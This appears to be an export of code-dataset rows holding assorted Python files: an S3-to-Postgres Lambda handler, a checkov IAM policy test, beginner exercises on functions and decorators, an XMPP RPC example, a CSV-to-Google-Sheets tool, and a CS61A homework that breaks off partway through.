| 40.490566 | 98 | 0.682199 | 467 | 4,292 | 6.012848 | 0.188437 | 0.209402 | 0.080128 | 0.064815 | 0.389601 | 0.259972 | 0.12963 | 0.032051 | 0 | 0 | 0 | 0.001807 | 0.226468 | 4,292 | 106 | 99 | 40.490566 | 0.843976 | 0.025862 | 0 | 0.16129 | 0 | 0 | 0.071839 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043011 | false | 0 | 0.043011 | 0 | 0.344086 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0add5b092c6c665d2b618a20a05d4cd299d00402
| 1,948 |
py
|
Python
|
src/handler.py
|
MrIgumnov96/ETL-CloudDeployment
|
666b85a9350460fba49f82ec90f5cddc0bdd0235
|
[
"Unlicense"
] | null | null | null |
src/handler.py
|
MrIgumnov96/ETL-CloudDeployment
|
666b85a9350460fba49f82ec90f5cddc0bdd0235
|
[
"Unlicense"
] | null | null | null |
src/handler.py
|
MrIgumnov96/ETL-CloudDeployment
|
666b85a9350460fba49f82ec90f5cddc0bdd0235
|
[
"Unlicense"
] | null | null | null |
import boto3
import src.app as app
import csv
import psycopg2 as ps
import os
from dotenv import load_dotenv
load_dotenv()
dbname = os.environ["db"]
host = os.environ["host"]
port = os.environ["port"]
user = os.environ["user"]
password = os.environ["pass"]
connection = ps.connect(dbname=dbname,
host=host,
port=port,
user=user,
password=password)
def handle(event, context):
cursor = connection.cursor()
cursor.execute("SELECT 1", ())
print(cursor.fetchall())
# Get key and bucket informaition
key = event['Records'][0]['s3']['object']['key']
bucket = event['Records'][0]['s3']['bucket']['name']
# use boto3 library to get object from S3
s3 = boto3.client('s3')
s3_object = s3.get_object(Bucket = bucket, Key = key)
data = s3_object['Body'].read().decode('utf-8')
all_lines = []
# read CSV
# csv_data = csv.reader(data.splitlines())
# for row in csv_data:
# datestr = row[0] #.replace('/', '-')
# # print(datestr)
# date_obj = datetime.strptime(datestr, '%d/%m/%Y %H:%M')
# # print(date_obj)
# # time = str(row[0][-5:])
# location = str(row[1])
# order = str(row[3])
# total = str(row[4])
# all_lines.append({'date':date_obj, 'location':location, 'order':order, 'total':total})
# return cached_list
# print(all_lines)
app.start_app(all_lines, data)
    for line in all_lines:
        print(line)
return {"message": "success!!! Check the cloud watch logs for this lambda in cloudwatch https://eu-west-1.console.aws.amazon.com/cloudwatch/home?region=eu-west-1#logsV2:log-groups"}
# Form all the lines of data into a list of lists
# all_lines = [line for line in csv_data]
# print(data)
# print(all_lines)
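# Event shape sketch (abridged S3 put-notification; bucket and key values
# are illustrative):
#
# {"Records": [{"s3": {"bucket": {"name": "my-bucket"},
#                      "object": {"key": "data/orders.csv"}}}]}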
| 31.419355 | 185 | 0.587269 | 259 | 1,948 | 4.324324 | 0.42471 | 0.064286 | 0.046429 | 0.026786 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017446 | 0.264374 | 1,948 | 62 | 186 | 31.419355 | 0.764131 | 0.325975 | 0 | 0 | 0 | 0.032258 | 0.186191 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0.064516 | 0.193548 | 0 | 0.258065 | 0.096774 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0ae19706ac78f27bbbf84e3668bc38423a4a2fcd
| 739 |
py
|
Python
|
feaas/runners/__init__.py
|
tsuru/varnishapi
|
d63a8c8c5f9c837855509fc5af59d8213c1c91d6
|
[
"BSD-3-Clause"
] | 3 |
2015-05-04T03:20:09.000Z
|
2016-02-19T10:35:35.000Z
|
feaas/runners/__init__.py
|
tsuru/varnishapi
|
d63a8c8c5f9c837855509fc5af59d8213c1c91d6
|
[
"BSD-3-Clause"
] | 3 |
2015-01-02T13:18:56.000Z
|
2021-02-08T20:17:14.000Z
|
feaas/runners/__init__.py
|
tsuru/varnishapi
|
d63a8c8c5f9c837855509fc5af59d8213c1c91d6
|
[
"BSD-3-Clause"
] | 5 |
2015-01-02T13:11:45.000Z
|
2016-08-26T06:14:35.000Z
|
# Copyright 2014 varnishapi authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import time
from feaas import storage
class Base(object):
def __init__(self, manager, interval, *locks):
self.manager = manager
self.storage = manager.storage
self.interval = interval
def init_locker(self, *lock_names):
self.locker = storage.MultiLocker(self.storage)
for lock_name in lock_names:
self.locker.init(lock_name)
def loop(self):
self.running = True
while self.running:
self.run()
time.sleep(self.interval)
def stop(self):
self.running = False
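# Subclass sketch (the run() body is illustrative; loop() above invokes it
# once per `interval` seconds while self.running is True):
#
#     class Cleaner(Base):
#         def run(self):
#             pass  # one unit of work per iteration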
| 24.633333 | 57 | 0.649526 | 96 | 739 | 4.90625 | 0.5625 | 0.070064 | 0.055202 | 0.080679 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007421 | 0.270636 | 739 | 29 | 58 | 25.482759 | 0.866419 | 0.207037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ae880533e14de2255d5554b8a0bb6b7cbc5e1bb
| 1,089 |
py
|
Python
|
Assignment 1 n 2 Day 8.py
|
paju3125/LetsUpgrade-Python-B7
|
c5767361f60f1ec405ab235af85035e2bb9a71e3
|
[
"Apache-2.0"
] | null | null | null |
Assignment 1 n 2 Day 8.py
|
paju3125/LetsUpgrade-Python-B7
|
c5767361f60f1ec405ab235af85035e2bb9a71e3
|
[
"Apache-2.0"
] | null | null | null |
Assignment 1 n 2 Day 8.py
|
paju3125/LetsUpgrade-Python-B7
|
c5767361f60f1ec405ab235af85035e2bb9a71e3
|
[
"Apache-2.0"
] | null | null | null |
# Assignment 1 Day 8
# write a decorator function for taking input for you
# any kind of function you want to build
def getInput(calculate_arg_fuc):
def wrap_function():
print("Enter two numbers ")
a=int(input("Enter first number = "))
b=int(input("Enter second number = "))
calculate_arg_fuc(a,b)
return wrap_function
@getInput
def addition(num1,num2):
print("Addition = ",num1+num2)
@getInput
def subtraction(num1,num2):
print("Subtraction = ",num1-num2)
@getInput
def multiplication(num1,num2):
print("Multiplication = ",num1*num2)
@getInput
def division(num1,num2):
print("Division = ",num1/num2)
addition()
subtraction()
multiplication()
division()
# Assignment 2 day 8
# you need to develop a python program to open a file in read only mode and
# try writing something to it and handlethe subsequent errorusing Exception Handling
try:
f=open("abc.txt","r");
f.write("Heyy, i am prajval");
f.close();
except:
print("File is in read only mode...")
| 22.22449 | 85 | 0.651974 | 146 | 1,089 | 4.821918 | 0.493151 | 0.090909 | 0.073864 | 0.080966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024067 | 0.236915 | 1,089 | 48 | 86 | 22.6875 | 0.823105 | 0.264463 | 0 | 0.137931 | 0 | 0 | 0.226542 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.206897 | false | 0 | 0 | 0 | 0.241379 | 0.206897 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0af1a3c68967c05606abe6a22eb2bbc2a17f6f6f
| 1,164 |
py
|
Python
|
tests/serverless/checks/aws/test_AdminPolicyDocument.py
|
peaudecastor/checkov
|
a4804b61c1b1390b7abd44ab53285fcbc3e7e80b
|
[
"Apache-2.0"
] | null | null | null |
tests/serverless/checks/aws/test_AdminPolicyDocument.py
|
peaudecastor/checkov
|
a4804b61c1b1390b7abd44ab53285fcbc3e7e80b
|
[
"Apache-2.0"
] | null | null | null |
tests/serverless/checks/aws/test_AdminPolicyDocument.py
|
peaudecastor/checkov
|
a4804b61c1b1390b7abd44ab53285fcbc3e7e80b
|
[
"Apache-2.0"
] | null | null | null |
import os
import unittest
from checkov.serverless.checks.function.aws.AdminPolicyDocument import check
from checkov.serverless.runner import Runner
from checkov.runner_filter import RunnerFilter
class TestAdminPolicyDocument(unittest.TestCase):
def test_summary(self):
runner = Runner()
current_dir = os.path.dirname(os.path.realpath(__file__))
# Used in
os.environ["sneaky_var"] = "*"
test_files_dir = current_dir + "/example_AdminPolicyDocument"
report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
summary = report.get_summary()
self.assertEqual(summary['passed'], 2,
f"Passed checks: {[fc.file_path for fc in report.passed_checks]}")
self.assertEqual(summary['failed'], 6,
f"Failed checks: {[fc.file_path for fc in report.failed_checks]}")
self.assertEqual(summary['skipped'], 0,
f"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}")
self.assertEqual(summary['parsing_errors'], 0)
if __name__ == '__main__':
unittest.main()
| 36.375 | 102 | 0.668385 | 137 | 1,164 | 5.445255 | 0.40146 | 0.080429 | 0.117962 | 0.064343 | 0.116622 | 0.116622 | 0.116622 | 0.116622 | 0 | 0 | 0 | 0.00441 | 0.22079 | 1,164 | 31 | 103 | 37.548387 | 0.818082 | 0.006014 | 0 | 0 | 0 | 0 | 0.232035 | 0.082251 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.045455 | false | 0.090909 | 0.227273 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0af3eac5180ad01027c97600a407eb3106203f56
| 349 |
py
|
Python
|
pythonProject/MUNDO 2/Desafio 54.py
|
lucasjlgc/Aulas-de-Python-
|
6aaed1c660487a680e9c449210600ccdfa326612
|
[
"MIT"
] | null | null | null |
pythonProject/MUNDO 2/Desafio 54.py
|
lucasjlgc/Aulas-de-Python-
|
6aaed1c660487a680e9c449210600ccdfa326612
|
[
"MIT"
] | 1 |
2021-06-25T15:29:11.000Z
|
2021-06-25T15:29:11.000Z
|
pythonProject/MUNDO 2/Desafio 54.py
|
lucasjlgc/Aulas-de-Python-
|
6aaed1c660487a680e9c449210600ccdfa326612
|
[
"MIT"
] | null | null | null |
#Leia o ano de nascimento de 7 pessoas e mostre quantas ja atingiram a maioridade e quantas ainda não
for c in range(1,8):
p=int(input('Qual o ano de seu nascimento? '))
a=2021-p
if a>= 18:
print('A pessoa numero {} já é maior de idade'.format(c))
else:
print('A pessoa numero {} não é maior de idade!'.format(c))
| 29.083333 | 101 | 0.638968 | 63 | 349 | 3.539683 | 0.619048 | 0.035874 | 0.053812 | 0.161435 | 0.179372 | 0.179372 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 0.252149 | 349 | 11 | 102 | 31.727273 | 0.819923 | 0.286533 | 0 | 0 | 0 | 0 | 0.435484 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0af8af43646ac075b324487dffc3942d97354220
| 1,145 |
py
|
Python
|
examples/rpc_server_side.py
|
calendar42/SleekXMPP--XEP-0080-
|
d7bd5fd29f26a5d7de872a49ff63a353b8043e49
|
[
"BSD-3-Clause"
] | 1 |
2016-10-24T05:30:25.000Z
|
2016-10-24T05:30:25.000Z
|
examples/rpc_server_side.py
|
vijayp/SleekXMPP
|
b2e7f57334d27f140f079213c2016615b7168742
|
[
"BSD-3-Clause"
] | null | null | null |
examples/rpc_server_side.py
|
vijayp/SleekXMPP
|
b2e7f57334d27f140f079213c2016615b7168742
|
[
"BSD-3-Clause"
] | null | null | null |
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2011 Dann Martens
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
from sleekxmpp.plugins.xep_0009.remote import Endpoint, remote, Remote, \
ANY_ALL
import threading
class Thermostat(Endpoint):
def FQN(self):
return 'thermostat'
def __init(self, initial_temperature):
self._temperature = initial_temperature
self._event = threading.Event()
@remote
def set_temperature(self, temperature):
print("Setting temperature to %s" % temperature)
self._temperature = temperature
@remote
def get_temperature(self):
return self._temperature
@remote(False)
def release(self):
self._event.set()
def wait_for_release(self):
self._event.wait()
def main():
session = Remote.new_session('sleek@xmpp.org/rpc', '*****')
thermostat = session.new_handler(ANY_ALL, Thermostat, 18)
thermostat.wait_for_release()
session.close()
if __name__ == '__main__':
main()
| 22.019231 | 73 | 0.627074 | 125 | 1,145 | 5.512 | 0.472 | 0.108853 | 0.113208 | 0.058055 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012063 | 0.275983 | 1,145 | 52 | 74 | 22.019231 | 0.819059 | 0.125764 | 0 | 0.071429 | 0 | 0 | 0.067485 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.071429 | 0.071429 | 0.428571 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0afbde7fb6ef3a1d965ab24316c2720252ada994
| 970 |
py
|
Python
|
csv2googlesheets/to_google_sheets.py
|
AlexSkrn/csv2googlesheets
|
71656dcc6827b1c58ffe80bc55aa6f1ee816f216
|
[
"MIT"
] | null | null | null |
csv2googlesheets/to_google_sheets.py
|
AlexSkrn/csv2googlesheets
|
71656dcc6827b1c58ffe80bc55aa6f1ee816f216
|
[
"MIT"
] | null | null | null |
csv2googlesheets/to_google_sheets.py
|
AlexSkrn/csv2googlesheets
|
71656dcc6827b1c58ffe80bc55aa6f1ee816f216
|
[
"MIT"
] | null | null | null |
"""This module provides a console interface to convert CSV to Google Sheets."""
from csv2googlesheets.gapi_authorization import auth_with_google
from csv2googlesheets.gapi_create_sheet import create_sheet
from csv2googlesheets.gapi_write_to_sheet import write_to_sheet
from csv2googlesheets.parse_file import build_spreadsheet_title
from csv2googlesheets.parse_file import parse_file
from csv2googlesheets.parse_cli_args import parse_cli_args
def main():
"""Control the flow of operations to write data from csv to G Sheets."""
cli_args = parse_cli_args()
values = parse_file(path=cli_args.csv)
spreadsheet_title = build_spreadsheet_title(cli_args.csv)
google_service = auth_with_google(path_creds=cli_args.credentials_json)
spreadsheet_id = create_sheet(google_service, spreadsheet_title)
write_to_sheet(
google_service,
sheet_id=spreadsheet_id,
values=values,
)
if __name__ == '__main__':
main()
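# Invocation sketch (flag names are assumptions inferred from the
# `cli_args.csv` and `cli_args.credentials_json` attributes used above;
# the real flags are defined in parse_cli_args):
#
#     python -m csv2googlesheets.to_google_sheets \
#         --csv data.csv --credentials_json credentials.json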
| 32.333333 | 79 | 0.786598 | 131 | 970 | 5.427481 | 0.351145 | 0.068917 | 0.101266 | 0.081575 | 0.098453 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007308 | 0.153608 | 970 | 29 | 80 | 33.448276 | 0.858709 | 0.14433 | 0 | 0 | 0 | 0 | 0.009768 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.315789 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
e40169279b6d0abaccc4f8f3610827c98bbcceff
| 6,197 |
py
|
Python
|
Overview/11 - funktsioonid.py
|
priidupaomets/python_kursus
|
731ab386ca40c321288659db21db23912ca7f8dd
|
[
"MIT"
] | 1 |
2021-02-19T15:21:28.000Z
|
2021-02-19T15:21:28.000Z
|
Overview/11 - funktsioonid.py
|
priidupaomets/python_kursus
|
731ab386ca40c321288659db21db23912ca7f8dd
|
[
"MIT"
] | null | null | null |
Overview/11 - funktsioonid.py
|
priidupaomets/python_kursus
|
731ab386ca40c321288659db21db23912ca7f8dd
|
[
"MIT"
] | 1 |
2018-03-24T11:01:46.000Z
|
2018-03-24T11:01:46.000Z
|
"""
funktsioonid.py
Using functions and procedures
"""
#
# Procedure
#
def minu_funktsioon():
    print("This is a procedure")
# Call the function
minu_funktsioon()
#
# Function
#
def liida(num1, num2):
return num1 + num2
sum = liida(3, 5)
print(sum)
# An example of using default values
# def funk(arg1 = value1, arg2 = value2)
#     pass
def funk(arg1 = 0, arg2 = "Test"):
    print(arg1, arg2)
funk()  # Call the function without passing any arguments
#
# Finding prime numbers
#
def isprime(n):
    if n <= 1:
        return False
    for i in range(2, n):
        if n % i == 0:
            return False
    return True
# Call the function to test it out
n = 5
if isprime(n):
    print(f"{n} IS a prime")  # Using an f-string, which lets us put the variable straight into the string
else:
    print(f"{n} is NOT a prime")
def list_primes(max_num = 100):
for n in range(2, max_num):
if isprime(n):
print(n, end = ' ', flush = True)
print()
list_primes()
#
# Functions with a variable number of arguments
#
# Simply add new arguments
def summa(num1, num2, num3):
return num1 + num2 + num3
print(summa(1, 2, 3))  # Works
print(summa(1, 2))  # We get an error, because the new function requires 3 arguments
# Try out function overloading (function overloading or method overloading)
def summa(num1, num2):
return num1 + num2
def summa(num1, num2, num3):
return num1 + num2 + num3
print(summa(1, 2))  # We get an error, because the last def overwrites the previous one
print(summa(1, 2, 3))
# Try out functions with default values
def summa(num1, num2, num3 = 0, num4 = 0):
return num1 + num2 + num3 + num4
print(summa(1, 2))
print(summa(1, 2, 3))
print(summa(1, 2, 3, 4))
#print(summa(1, 2, 3, 4, 5))  # To make this work we must change the function
def keskmine(num1, num2, num3 = 0, num4 = 0):
    sum = num1 + num2 + num3 + num4  # Same as summa(num1, num2, num3, num4)
argumente = 4.0
return sum / argumente
print(keskmine(1, 2))  # An obviously wrong result (0.75 instead of 1.5)
print(keskmine(1, 2, 3))  # Also a wrong result (1.5 instead of 2)
print(keskmine(1, 2, 3, 4))  # Correct result
# Improve how the number of arguments is determined
def keskmine(num1, num2, num3 = 0, num4 = 0):
    sum = num1 + num2 + num3 + num4  # Same as summa(num1, num2, num3, num4)
    argumente = 2.0  # At least 2
if num3 > 0:
argumente = argumente + 1
if num4 > 0:
argumente = argumente + 1
return sum / argumente
print(keskmine(1, 2))  # Correct result
print(keskmine(1, 2, 3))  # Correct result
print(keskmine(1, 2, 3, 4))  # Correct result
print(keskmine(1, 2, 3, 0))  # Wrong result!
print(keskmine(1, 0, 3, 2))  # Correct result!?! How is this one correct - does the result depend on the order of the arguments?
# Use a different default value
def keskmine(num1, num2, num3 = None, num4 = None):
    sum = num1 + num2  # Cannot add all 4 args together right away
    argumente = 2.0  # At least 2
if num3 is not None:
argumente += 1
sum = sum + num3
if num4 is not None:
argumente += 1
sum = sum + num4
return sum / argumente
print(keskmine(1, 2))  # Correct result
print(keskmine(1, 2, 3))  # Correct result
print(keskmine(1, 2, 3, 4))  # Correct result
print(keskmine(1, 2, 3, 0))  # Correct result!
print(keskmine(1, 0, 3, 2))  # Correct result
# Try defining the arguments with a list
def summa(numbrid=[]):
sum = 0
for num in numbrid:
sum += num
return sum
#print(summa(1))  # Does not work, because an int is not an iterable type
#print(summa(1, 2))  # Does not work, because the arguments are not a list
arvud=[1, 2]
print(summa(arvud))
arvud=[1, 2, 3]
print(summa(arvud))
arvud=[1, 2, 3, 4]
print(summa(arvud))
print(summa([1, 2, 3, 4, 5]))  # We can also pass the list in without an intermediate variable
arvud=[1]
print(summa(arvud))
def summa(*numbrid):
sum = 0
for num in numbrid:
sum += num
return sum
print(summa()) # Isegi see variant töötab
print(summa(1))
print(summa(1, 2))
arvud=[1, 2]
print(summa(*arvud)) # Ka siin tuleb '*' kasutada
arvud=[1, 2, 3]
print(summa(*arvud))
arvud=[1, 2, 3, 4]
print(summa(*arvud))
arvud=[1, 2, 3, 4, 5]
print(summa(*arvud))
arvud=[1]
print(summa(*arvud))
# Different kinds of arguments
def argfun(arg1, arg2, *args, kw1=1, kw2="True"):
    print(arg1, arg2, *args, kw1, kw2)
argfun(1, 2, 3, 4, 5, kw1=10, kw2=12)
def argfun(**kwargs):
    for (arg, val) in kwargs.items():
        print(f"{arg}={val}", end=' ')
    print()
argfun(kw2=10, kw3=12, kw4=14)
def argfun(arg1, arg2, *args, **kwargs):
    print(arg1, arg2, *args)
    for (arg, val) in kwargs.items():
        print(f"{arg}={val}", end=' ')
    print()
argfun(1, 2, 3, 4, 5, kw2=10, kw3=12, kw4=14)
def argfun(arg1, arg2, *args, kw1=1, kw2="True", **kwargs):
    print(arg1, arg2, *args, kw1, kw2)
    for (arg, val) in kwargs.items():
        print(f"{arg}={val}", end=' ')
    print()
argfun(1, 2, 3, 4, 5, kw2=10, kw3=12, kw4=14)
# How do we guarantee that the arguments are numbers?
def numsum(*numbrid):
    sum = 0
    for num in numbrid:
        if isinstance(num, int) or isinstance(num, float):
            sum += num
    return sum
def numcount(*numbrid):
    count = 0
    for num in numbrid:
        if isinstance(num, int) or isinstance(num, float):
            count += 1
    return count
def numavg(*numbrid):
    sum = numsum(*numbrid)
    count = numcount(*numbrid)
    return sum / (count * 1.0)  # Multiplying by 1.0 forces float division
print(numsum(1))
print(numsum(1, 2))
print(numsum(1, 2, 3))
print(numsum(1, 2, 3, "4"))
print(numsum(1, None, 3, 4, 5))
print("-" * 30)
print(numcount(1))
print(numcount(1, 2))
print(numcount(1, 2, 3))
print(numcount(1, 2, 3, "4"))
print(numcount(1, None, 3, 4, 5))
print("-" * 30)
print(numavg(1))
print(numavg(1, 2))
print(numavg(1, 2, 3))
print(numavg(1, 2, 3, "4"))
print(numavg(1, None, 3, 4, 5))
# print(numavg())  # Error! Division by zero!!! (commented out so the script can run)
# We will look at error handling more closely shortly
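# A forward-looking sketch (added here, not part of the original lesson): one
# way to guard numavg against the division by zero shown above is to check the
# count first. The name numavg_safe is hypothetical.
def numavg_safe(*numbrid):
    count = numcount(*numbrid)
    if count == 0:
        return None  # or raise a ValueError, once error handling is covered
    return numsum(*numbrid) / count
print(numavg_safe())  # -> None instead of a ZeroDivisionError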
| 24.01938 | 116 | 0.606745 | 916 | 6,197 | 4.098253 | 0.209607 | 0.021843 | 0.022376 | 0.015983 | 0.51252 | 0.428609 | 0.393713 | 0.333777 | 0.313266 | 0.283165 | 0 | 0.072966 | 0.250282 | 6,197 | 257 | 117 | 24.11284 | 0.735041 | 0.272229 | 0 | 0.563636 | 0 | 0 | 0.022732 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.127273 | false | 0 | 0 | 0.030303 | 0.224242 | 0.406061 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0
| 1 |
e40722bed82cf8f0cac95ef9146f043dd3dc25ca
| 5,318 |
py
|
Python
|
05-Environments/hw02/hw02/hw02.py
|
ericchen12377/CS61A_LearningDoc
|
31f23962b0e2834795bf61eeb0f4884cc5da1809
|
[
"MIT"
] | 2 |
2020-04-24T18:36:53.000Z
|
2020-04-25T00:15:55.000Z
|
05-Environments/hw02/hw02/hw02.py
|
ericchen12377/CS61A_LearningDoc
|
31f23962b0e2834795bf61eeb0f4884cc5da1809
|
[
"MIT"
] | null | null | null |
05-Environments/hw02/hw02/hw02.py
|
ericchen12377/CS61A_LearningDoc
|
31f23962b0e2834795bf61eeb0f4884cc5da1809
|
[
"MIT"
] | null | null | null |
""" Homework 2: Higher Order Functions"""
HW_SOURCE_FILE = 'hw02.py'
from operator import add, mul, sub
square = lambda x: x * x
identity = lambda x: x
triple = lambda x: 3 * x
increment = lambda x: x + 1
######################
# Required Questions #
######################
def product(n, f):
"""Return the product of the first n terms in a sequence.
n -- a positive integer
f -- a function that takes one argument to produce the term
>>> product(3, identity) # 1 * 2 * 3
6
>>> product(5, identity) # 1 * 2 * 3 * 4 * 5
120
>>> product(3, square) # 1^2 * 2^2 * 3^2
36
>>> product(5, square) # 1^2 * 2^2 * 3^2 * 4^2 * 5^2
14400
>>> product(3, increment) # (1+1) * (2+1) * (3+1)
24
>>> product(3, triple) # 1*3 * 2*3 * 3*3
162
"""
"*** YOUR CODE HERE ***"
result,k = 1,1
while k <= n:
result,k = f(k)*result, k + 1
return result
def accumulate(combiner, base, n, f):
"""Return the result of combining the first n terms in a sequence and base.
The terms to be combined are f(1), f(2), ..., f(n). combiner is a
two-argument commutative, associative function.
>>> accumulate(add, 0, 5, identity) # 0 + 1 + 2 + 3 + 4 + 5
15
>>> accumulate(add, 11, 5, identity) # 11 + 1 + 2 + 3 + 4 + 5
26
>>> accumulate(add, 11, 0, identity) # 11
11
>>> accumulate(add, 11, 3, square) # 11 + 1^2 + 2^2 + 3^2
25
>>> accumulate(mul, 2, 3, square) # 2 * 1^2 * 2^2 * 3^2
72
>>> accumulate(lambda x, y: x + y + 1, 2, 3, square)
19
>>> accumulate(lambda x, y: 2 * (x + y), 2, 3, square)
58
>>> accumulate(lambda x, y: (x + y) % 17, 19, 20, square)
16
"""
"*** YOUR CODE HERE ***"
result, k = base,1
while k <= n:
result, k = combiner(result,f(k)), k + 1
return result
def summation_using_accumulate(n, f):
"""Returns the sum of f(1) + ... + f(n). The implementation
uses accumulate.
>>> summation_using_accumulate(5, square)
55
>>> summation_using_accumulate(5, triple)
45
>>> from construct_check import check
>>> # ban iteration and recursion
>>> check(HW_SOURCE_FILE, 'summation_using_accumulate',
... ['Recursion', 'For', 'While'])
True
"""
"*** YOUR CODE HERE ***"
# result, k = 0, 1
# while k <= n:
# result, k = result + f(k), k + 1
return accumulate(add,0,n,f)
def product_using_accumulate(n, f):
"""An implementation of product using accumulate.
>>> product_using_accumulate(4, square)
576
>>> product_using_accumulate(6, triple)
524880
>>> from construct_check import check
>>> # ban iteration and recursion
>>> check(HW_SOURCE_FILE, 'product_using_accumulate',
... ['Recursion', 'For', 'While'])
True
"""
"*** YOUR CODE HERE ***"
# result, k = 1, 1
# while k <= n:
# result, k = result * f(k), k + 1
return accumulate(mul,1,n,f)
def compose1(h, g):
"""Return a function f, such that f(x) = h(g(x))."""
def f(x):
return h(g(x))
return f
def make_repeater(h, n):
"""Return the function that computes the nth application of h.
>>> add_three = make_repeater(increment, 3)
>>> add_three(5)
8
>>> make_repeater(triple, 5)(1) # 3 * 3 * 3 * 3 * 3 * 1
243
>>> make_repeater(square, 2)(5) # square(square(5))
625
>>> make_repeater(square, 4)(5) # square(square(square(square(5))))
152587890625
>>> make_repeater(square, 0)(5) # Yes, it makes sense to apply the function zero times!
5
"""
"*** YOUR CODE HERE ***"
def repeater(x):
result, k = x,1
while k <= n:
result,k = h(result), k + 1
return result
return repeater
##########################
# Just for fun Questions #
##########################
def zero(f):
return lambda x: x
def successor(n):
return lambda f: lambda x: f(n(f)(x))
def one(f):
"""Church numeral 1: same as successor(zero)"""
"*** YOUR CODE HERE ***"
return lambda x: f(x)
def two(f):
"""Church numeral 2: same as successor(successor(zero))"""
"*** YOUR CODE HERE ***"
return lambda x: f(f(x))
three = successor(two)
def church_to_int(n):
"""Convert the Church numeral n to a Python integer.
>>> church_to_int(zero)
0
>>> church_to_int(one)
1
>>> church_to_int(two)
2
>>> church_to_int(three)
3
"""
"*** YOUR CODE HERE ***"
return n(lambda x: x + 1)(0)
def add_church(m, n):
"""Return the Church numeral for m + n, for Church numerals m and n.
>>> church_to_int(add_church(two, three))
5
"""
"*** YOUR CODE HERE ***"
return lambda f: lambda x: m(f)(n(f)(x))
def mul_church(m, n):
"""Return the Church numeral for m * n, for Church numerals m and n.
>>> four = successor(three)
>>> church_to_int(mul_church(two, three))
6
>>> church_to_int(mul_church(three, four))
12
"""
"*** YOUR CODE HERE ***"
return lambda f: m(n(f))
def pow_church(m, n):
"""Return the Church numeral m ** n, for Church numerals m and n.
>>> church_to_int(pow_church(two, three))
8
>>> church_to_int(pow_church(three, two))
9
"""
"*** YOUR CODE HERE ***"
return n(m)
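
# An alternative sketch (our addition, not part of the handout): make_repeater
# can itself be expressed with accumulate and compose1 by composing h with
# itself n times; identity is the base of the composition. The name below is
# hypothetical.
def make_repeater_via_accumulate(h, n):
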